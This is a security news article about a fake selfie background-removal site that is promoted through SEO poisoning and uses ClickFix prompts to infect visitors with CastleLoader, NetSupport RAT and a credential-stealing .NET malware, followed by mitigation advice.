“What started as someone potentially trying to remove the background of a selfie ended with a custom .NET stealer digging into their browser passwords”: Experts warn free image editing tool could actually be dangerous malware.

A fake photo tool ranking high in search results tricks users into running malware via ClickFix tactic.
Victims are first infected by CastleLoader, which then deploys NetSupport RAT and a custom CastleStealer.
The campaign highlights how SEO poisoning and social engineering can turn simple tasks into credential theft and remote compromise.

A website promising to remove the background from selfie photos is really just delivering information-stealing malware to users’ computers, security researchers say.

Cybersecurity experts at Huntress have explained how they discovered a website that, through SEO poisoning, managed to claw its way to the top of search engine results pages. Therefore, when people search for background removal tools, there is a high chance that they will land on this particular malicious site.

When they upload their photos to this service, they are not really processed. Nothing is uploaded or shared in any way. However, the site then asks the user to “verify that they are human” by opening the Windows Run program and pasting a command that has been copied to their clipboard.

CastleLoader, CastleStealer and NetSupport RAT

In typical ClickFix fashion, the attackers actually ask victims to run malware themselves, first infecting their devices with CastleLoader. This is the primary charger used to deliver additional payloads.

Using CastleLoader, attackers can then deploy second-stage malware, including NetSupport RAT and CastleStealer.

The first is a Remote Access Trojan (RAT) that allows attackers to remotely access infected systems, while the second is a custom .NET stealer that targets browser credentials, crypto wallet data, Discord tokens, and Telegram session files.

“What started as someone potentially trying to remove the background of a selfie ended with a custom .NET stealer snooping through their browser passwords, crypto wallet vaults, and Telegram session, as well as dropping a NetSupport RAT onto disk for later access,” Huntress explained.

ClickFix attacks can be mitigated through education: users should know that no legitimate service will ask them to verify that they are not a robot having activity on the device (for example, running a program locally). Alternatively, administrators can disable the Win+R shortcut for Run, making it less likely that victims will actually execute the malicious code.